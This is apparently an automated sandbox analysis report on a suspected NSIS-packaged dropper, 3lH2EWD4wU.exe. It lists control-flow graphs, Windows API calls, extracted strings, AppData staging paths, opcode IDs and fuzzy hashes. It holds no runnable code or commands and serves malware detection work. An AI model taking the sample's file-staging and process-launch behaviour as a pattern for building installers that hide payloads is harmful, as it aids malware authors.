                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3lH2EWD4wU.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 4283519449-2608562989
                                                  • Opcode ID: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                                  • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                                                  • Opcode Fuzzy Hash: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                                  • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 431 405fc2-405fcd 432 405fe0-405ff6 431->432 433 405fcf-405fde 431->433 434 4061e7-4061eb 432->434 435 405ffc-406007 432->435 433->432 436 4061f1-4061fb 434->436 437 406019-406023 434->437 435->434 438 40600d-406014 435->438 439 406206-406207 436->439 440 4061fd-406201 call 405fa0 436->440 437->436 441 406029-406030 437->441 438->434 440->439 443 406036-40606a 441->443 444 4061da 441->444 445 406070-40607a 443->445 446 406187-40618a 443->446 447 4061e4-4061e6 444->447 448 4061dc-4061e2 444->448 449 406094 445->449 450 40607c-406080 445->450 451 4061ba-4061bd 446->451 452 40618c-40618f 446->452 447->434 448->434 456 40609b-4060a2 449->456 450->449 453 406082-406086 450->453 457 4061cb-4061d8 lstrlenA 451->457 458 4061bf-4061c6 call 405fc2 451->458 454 406191-40619d call 405efe 452->454 455 40619f-4061ab call 405fa0 452->455 453->449 459 406088-40608c 453->459 469 4061b0-4061b6 454->469 455->469 461 4060a4-4060a6 456->461 462 4060a7-4060a9 456->462 457->434 458->457 459->449 465 40608e-406092 459->465 461->462 467 4060e2-4060e5 462->467 468 4060ab-4060ce call 405e87 462->468 465->456 470 4060f5-4060f8 467->470 471 4060e7-4060f3 GetSystemDirectoryA 467->471 481 4060d4-4060dd call 405fc2 468->481 482 40616e-406172 468->482 469->457 473 4061b8 469->473 475 406165-406167 470->475 476 4060fa-406108 GetWindowsDirectoryA 470->476 474 406169-40616c 471->474 478 40617f-406185 call 40620a 473->478 474->478 474->482 475->474 480 40610a-406114 475->480 476->475 478->457 484 406116-406119 480->484 485 40612e-406144 SHGetSpecialFolderLocation 480->485 481->474 482->478 487 406174-40617a lstrcatA 482->487 484->485 488 40611b-406122 484->488 489 406162 485->489 490 406146-406160 SHGetPathFromIDListA CoTaskMemFree 485->490 487->478 492 40612a-40612c 488->492 489->475 490->474 490->489 492->474 492->485
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 004060ED
                                                  • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004050FF,Completed,00000000), ref: 00406100
                                                  • SHGetSpecialFolderLocation.SHELL32(004050FF,762323A0,?,Completed,00000000,004050FF,Completed,00000000), ref: 0040613C
                                                  • SHGetPathFromIDListA.SHELL32(762323A0,: Completed), ref: 0040614A
                                                  • CoTaskMemFree.OLE32(762323A0), ref: 00406156
                                                  • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                                                  • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,004050FF,Completed,00000000,00000000,00420FD4,762323A0), ref: 004061CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$Triu,fe$$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-1685223899
                                                  • Opcode ID: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
                                                  • Instruction ID: 277d3937a9213029abeea5e1082be0a56f2569e83deff567e7d71b2b9830288d
                                                  • Opcode Fuzzy Hash: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
                                                  • Instruction Fuzzy Hash: 2B61E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 493 401759-40177c call 402acb call 4059a5 498 401786-401798 call 405fa0 call 405938 lstrcatA 493->498 499 40177e-401784 call 405fa0 493->499 504 40179d-4017a3 call 40620a 498->504 499->504 509 4017a8-4017ac 504->509 510 4017ae-4017b8 call 4062a3 509->510 511 4017df-4017e2 509->511 518 4017ca-4017dc 510->518 519 4017ba-4017c8 CompareFileTime 510->519 513 4017e4-4017e5 call 405b14 511->513 514 4017ea-401806 call 405b39 511->514 513->514 521 401808-40180b 514->521 522 40187e-4018a7 call 4050c7 call 402f9c 514->522 518->511 519->518 524 401860-40186a call 4050c7 521->524 525 40180d-40184f call 405fa0 * 2 call 405fc2 call 405fa0 call 4056bc 521->525 536 4018a9-4018ad 522->536 537 4018af-4018bb SetFileTime 522->537 534 401873-401879 524->534 525->509 557 401855-401856 525->557 538 402960 534->538 536->537 540 4018c1-4018cc CloseHandle 536->540 537->540 544 402962-402966 538->544 542 4018d2-4018d5 540->542 543 402957-40295a 540->543 546 4018d7-4018e8 call 405fc2 lstrcatA 542->546 547 4018ea-4018ed call 405fc2 542->547 543->538 551 4018f2-4022ec call 4056bc 546->551 547->551 551->543 551->544 557->534 559 401858-401859 557->559 559->524
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,renegaternes,renegaternes,00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                    • Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                    • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                    • Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
                                                    • Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$Triu,fe$$Urbacity\Uninstall\deltransformations$renegaternes
                                                  • API String ID: 1941528284-2569544012
                                                  • Opcode ID: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                                  • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                                                  • Opcode Fuzzy Hash: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                                  • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 560 4050c7-4050dc 561 405192-405196 560->561 562 4050e2-4050f4 560->562 563 4050f6-4050fa call 405fc2 562->563 564 4050ff-40510b lstrlenA 562->564 563->564 566 405128-40512c 564->566 567 40510d-40511d lstrlenA 564->567 568 40513b-40513f 566->568 569 40512e-405135 SetWindowTextA 566->569 567->561 570 40511f-405123 lstrcatA 567->570 571 405141-405183 SendMessageA * 3 568->571 572 405185-405187 568->572 569->568 570->566 571->572 572->561 573 405189-40518c 572->573 573->561
                                                  APIs
                                                  • lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                  • lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                  • lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
                                                  • SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Completed
                                                  • API String ID: 2531174081-3087654605
                                                  • Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                                  • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                                                  • Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                                  • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 574 402f9c-402fb0 575 402fb2 574->575 576 402fb9-402fc2 574->576 575->576 577 402fc4 576->577 578 402fcb-402fd0 576->578 577->578 579 402fe0-402fed call 4031ae 578->579 580 402fd2-402fdb call 4031c4 578->580 584 402ff3-402ff7 579->584 585 40319c 579->585 580->579 586 403147-403149 584->586 587 402ffd-403046 GetTickCount 584->587 588 40319e-40319f 585->588 592 403189-40318c 586->592 593 40314b-40314e 586->593 589 4031a4 587->589 590 40304c-403054 587->590 591 4031a7-4031ab 588->591 589->591 594 403056 590->594 595 403059-403067 call 4031ae 590->595 596 403191-40319a call 4031ae 592->596 597 40318e 592->597 593->589 598 403150 593->598 594->595 595->585 607 40306d-403076 595->607 596->585 608 4031a1 596->608 597->596 601 403153-403159 598->601 602 40315b 601->602 603 40315d-40316b call 4031ae 601->603 602->603 603->585 611 40316d-403179 call 405be0 603->611 610 40307c-40309c call 40645d 607->610 608->589 616 4030a2-4030b5 GetTickCount 610->616 617 40313f-403141 610->617 618 403143-403145 611->618 619 40317b-403185 611->619 620 4030b7-4030bf 616->620 621 4030fa-4030fc 616->621 617->588 618->588 619->601 624 403187 619->624 625 4030c1-4030c5 620->625 626 4030c7-4030f2 MulDiv wsprintfA call 4050c7 620->626 622 403133-403137 621->622 623 4030fe-403102 621->623 622->590 629 40313d 622->629 627 403104-40310b call 405be0 623->627 628 403119-403124 623->628 624->589 625->621 625->626 633 4030f7 626->633 634 403110-403112 627->634 632 403127-40312b 628->632 629->589 632->610 635 403131 632->635 633->621 634->618 636 403114-403117 634->636 635->589 636->632
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: (TA$(TA$... %d%%
                                                  • API String ID: 551687249-2950751476
                                                  • Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                                  • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                                                  • Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                                  • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 637 4062ca-4062ea GetSystemDirectoryA 638 4062ec 637->638 639 4062ee-4062f0 637->639 638->639 640 406300-406302 639->640 641 4062f2-4062fa 639->641 643 406303-406335 wsprintfA LoadLibraryExA 640->643 641->640 642 4062fc-4062fe 641->642 642->643
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                  • wsprintfA.USER32 ref: 0040631A
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                  • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                                                  • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                  • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 644 405b68-405b72 645 405b73-405b9e GetTickCount GetTempFileNameA 644->645 646 405ba0-405ba2 645->646 647 405bad-405baf 645->647 646->645 648 405ba4 646->648 649 405ba7-405baa 647->649 648->649
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405B7C
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                                                  Strings
                                                  • nsa, xrefs: 00405B73
                                                  • "C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00405B68
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1906898991
                                                  • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                  • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                                                  • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                  • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 650 402bcd-402bf6 call 405e26 652 402bfb-402bfd 650->652 653 402c75-402c79 652->653 654 402bff-402c05 652->654 655 402c21-402c36 RegEnumKeyA 654->655 656 402c07-402c09 655->656 657 402c38-402c4a RegCloseKey call 406338 655->657 659 402c59-402c67 RegCloseKey 656->659 660 402c0b-402c1f call 402bcd 656->660 663 402c69-402c6f RegDeleteKeyA 657->663 664 402c4c-402c57 657->664 659->653 660->655 660->657 663->653 664->653
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                  • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                                                  • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                  • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 667 4015bb-4015ce call 402acb call 4059d1 672 4015d0-4015e3 call 405963 667->672 673 401624-401627 667->673 680 4015e5-4015e8 672->680 681 4015fb-4015fc call 40560a 672->681 674 401652-402242 call 401423 673->674 675 401629-401644 call 401423 call 405fa0 SetCurrentDirectoryA 673->675 690 402957-402966 674->690 691 40271c-402723 674->691 675->690 694 40164a-40164d 675->694 680->681 684 4015ea-4015f1 call 405627 680->684 692 401601-401603 681->692 684->681 698 4015f3-4015f9 call 40558d 684->698 691->690 695 401605-40160a 692->695 696 40161a-401622 692->696 694->690 699 401617 695->699 700 40160c-401615 GetFileAttributesA 695->700 696->672 696->673 698->692 699->696 700->696 700->699
                                                  APIs
                                                    • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                                    • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                    • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
                                                  • API String ID: 1892508949-1999411507
                                                  • Opcode ID: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
                                                  • Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
                                                  • Opcode Fuzzy Hash: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
                                                  • Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 704 40563f-405670 CreateProcessA 705 405672-40567b CloseHandle 704->705 706 40567e-40567f 704->706 705->706
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                                                  • CloseHandle.KERNEL32(?), ref: 00405675
                                                  Strings
                                                  • Error launching installer, xrefs: 00405652
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
